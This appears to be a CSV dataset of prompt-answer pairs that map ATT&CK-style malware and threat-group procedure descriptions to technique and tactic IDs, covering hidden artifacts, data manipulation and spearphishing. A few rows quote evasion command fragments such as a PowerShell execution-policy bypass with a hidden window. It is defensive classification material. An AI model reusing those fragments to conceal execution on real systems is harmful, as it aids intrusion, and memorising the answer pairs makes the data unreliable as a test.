+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to hide the window for operations performed on a given file.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has executed legitimate tools in hidden windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS has used -WindowsStyle Hidden to hide the command window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can hide the current window from the targeted user via the `ShowWindow` API function.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy uses -w Hidden to conceal a PowerShell window that downloads a payload.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to conceal its activity through hiding active windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has used the command Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden to hide its window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can modify processes to prevent them from being visible on the desktop.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has hidden its GUI using the ShowWindow() WINAPI call.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can hide its console window upon execution to decrease its visibility to a victim.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETCANARY can execute processes in a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though QuasarRAT can only be run on Windows systems.","Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuietSieve has the ability to execute payloads in a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY has the ability to set its window state to hidden.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can hide windows using `ProcessWindowStyle.Hidden`.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can execute PowerShell scripts in a hidden window.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has the ability to hide the console window for its document search module from the user.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used a hidden VNC (hVNC) window to monitor the victim and collect information stealthily.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif droppers have used COM properties to execute malware in hidden windows.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the ability of performing remote desktop access via a hVNC window for decreased visibility.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WindTail can instruct the OS to execute an application without a dock icon or menu.,"Tecnique: T1564.003 Hide Artifacts: Hidden Window, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 used NTFS alternate data streams to hide their payloads.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has used NTFS to hide files.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth can abuse alternate data streams (ADS) to store content for malicious payloads.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer has copied itself to the :bin alternate data stream of a newly created file.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The DEADEYE.EMBED variant of DEADEYE can embed its payload in an alternate data stream of a local file.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Expand can be used to download or copy a file into an alternate data stream.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in %PROGRAMDATA%\Windows\.","Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke hides many of its backdoor payloads in an alternate data stream (ADS).,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Regin malware platform uses Extended Attributes to store encrypted executables.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has the ability save and execute files as alternate data streams (ADS).,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker has the ability to save and execute files as an alternate data stream (ADS).,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some variants of the Zeroaccess Trojan have been known to store data in Extended Attributes.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: esentutl can be used to read and write alternate data streams.,"Tecnique: T1564.004 Hide Artifacts: NTFS File Attributes, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Equation has used an encrypted virtual file system stored in the Windows Registry.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Strider has used a hidden file system that is stored as a file on disk.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin has used a hidden file system to store some of its components.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos can use concealed storage mechanisms including an NTFS or FAT-16 filesystem encrypted with CAST-128 in CBC mode.,"Tecnique: T1564.005 Hide Artifacts: Hidden File System, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.","Tecnique: T1564.006 Hide Artifacts: Run Virtual Instance, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so Maze can encrypt files on the shared drives as well as the local machine.","Tecnique: T1564.006 Hide Artifacts: Run Virtual Instance, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.","Tecnique: T1564.006 Hide Artifacts: Run Virtual Instance, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked,"" ""phish,"" and “malware"" in a likely attempt to prevent organizations from communicating about their activities.","Tecnique: T1564.008 Hide Artifacts: Email Hiding Rules, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider creates inbound rules on the compromised email accounts of security personnel to automatically delete emails from vendor security products.,"Tecnique: T1564.008 Hide Artifacts: Email Hiding Rules, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses a resource fork to present a macOS JPEG or text file icon rather than the executable's icon assigned by the operating system.,"Tecnique: T1564.009 Hide Artifacts: Resource Forking, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.","Tecnique: T1564.009 Hide Artifacts: Resource Forking, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.,"Tecnique: T1564.010 Hide Artifacts: Process Argument Spoofing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT has the ability to modify its process memory to hide process command-line arguments.,"Tecnique: T1564.010 Hide Artifacts: Process Argument Spoofing, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The GoldMax Linux variant has been executed with the `nohup` command to ignore hangup signals and continue to run if the terminal session was terminated.,"Tecnique: T1564.011 Hide Artifacts: Ignore Process Interrupts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.,"Tecnique: T1564.011 Hide Artifacts: Ignore Process Interrupts, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has injected fraudulent transactions into compromised networks that mimic legitimate behavior to siphon off incremental amounts of money.,"Tecnique: T1565 Data Manipulation, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.","Tecnique: T1565.001 Data Manipulation: Stored Data Manipulation, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT created a copy of the SolarWinds Orion software source file with a .bk extension to backup the original content, wrote SUNBURST using the same filename but with a .tmp extension, and then moved SUNBURST using MoveFileEx to the original filename with a .cs extension so it could be compiled within Orion software.","Tecnique: T1565.001 Data Manipulation: Stored Data Manipulation, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.,"Tecnique: T1565.002 Data Manipulation: Transmitted Data Manipulation, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron is capable of modifying email content, headers, and attachments during transit.","Tecnique: T1565.002 Data Manipulation: Transmitted Data Manipulation, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.,"Tecnique: T1565.002 Data Manipulation: Transmitted Data Manipulation, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.","Tecnique: T1565.002 Data Manipulation: Transmitted Data Manipulation, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.,"Tecnique: T1565.003 Data Manipulation: Runtime Data Manipulation, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom has used spear phishing to initially compromise victims.,"Tecnique: T1566 Phishing, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victim's machines.,"Tecnique: T1566 Phishing, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hikit has been spread through spear phishing.,"Tecnique: T1566 Phishing, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal has been spread through the use of phishing campaigns including ""call back phishing"" where victims are lured into calling a number provided through email.","Tecnique: T1566 Phishing, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team obtained their initial foothold into many IT systems using Microsoft Office attachments delivered through phishing emails.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0011, Transparent Tribe sent malicious attachments via email to student targets in India.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors likely used spearphishing emails to send malicious Microsoft Word documents.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Spalax, the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT1 has sent spearphishing emails containing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has sent emails with malicious Microsoft Office documents and PDFs attached.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT30 has used spearphishing emails with malicious DOC attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has sent spearphishing emails with a malicious executable disguised as a document or spreadsheet.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has sent spearphishing e-mails with archive attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 delivers malware using spearphishing emails with malicious HWP attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has conducted spearphishing campaigns using malicious email attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has used personalized spearphishing attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Andariel has conducted spearphishing campaigns that included malicious Word or Excel attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has sent spearphishing emails with a malicious RTF document or Excel spreadsheet.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used spearphishing e-mails with malicious password-protected archived files (ZIP or RAR) to deliver malware.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has crafted and sent victims malicious attachments to gain initial access.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has sent spearphishing emails with malicious RAR and .LNK attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has sent emails with malicious attachments to gain initial access.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY conducted an e-mail thread-hijacking campaign with malicious ISO attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has sent spearphishing emails containing malicious attachments in the form of PDFs, Word documents, JavaScript files, and Control Panel File (CPL) executables.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has used spearphishing emails containing attachments (which are often stolen, legitimate documents sent from compromised accounts) with embedded malicious macros.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has targeted victims with e-mails containing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 sent spearphishing emails with either malicious Microsoft Documents or RTF files attached.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has distributed targeted emails containing Word documents with embedded malicious macros.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ferocious Kitten has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker sent emails with malicious Microsoft Office documents attached.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa has sent spearphishing emails containing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IndigoZebra sent spearphishing emails containing malicious password-protected RAR attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used emails containing Word, Excel and/or HWP (Hangul Word Processor) documents in their spearphishing campaigns.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has targeted victims with spearphishing emails containing malicious Microsoft Word documents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used spam emails weaponized with archive or document files as its initial infection vector.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete has delivered spearphishing emails that contain a zipped file with malicious contents.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malteiro has sent spearphishing emails containing malicious .zip files.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mofang delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.","Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats has sent phishing emails with malicious Microsoft Word and PDF attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used spearphishing attachments to deliver initial access payloads.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naikon has used malicious e-mail attachments to deliver malware.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus has targeted victims with spearphishing emails containing malicious attachments.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has sent spearphishing emails with attachments to victims as its primary initial access vector.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork has used spearphishing with an attachment to deliver files with exploits to initial victims.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has used spearphishing attachments to distribute its malware.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has attached a malicious document to an email to gain initial access.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails.,"Tecnique: T1566.001 Phishing: Spearphishing Attachment, Tactic: TA0001 Initial Access"
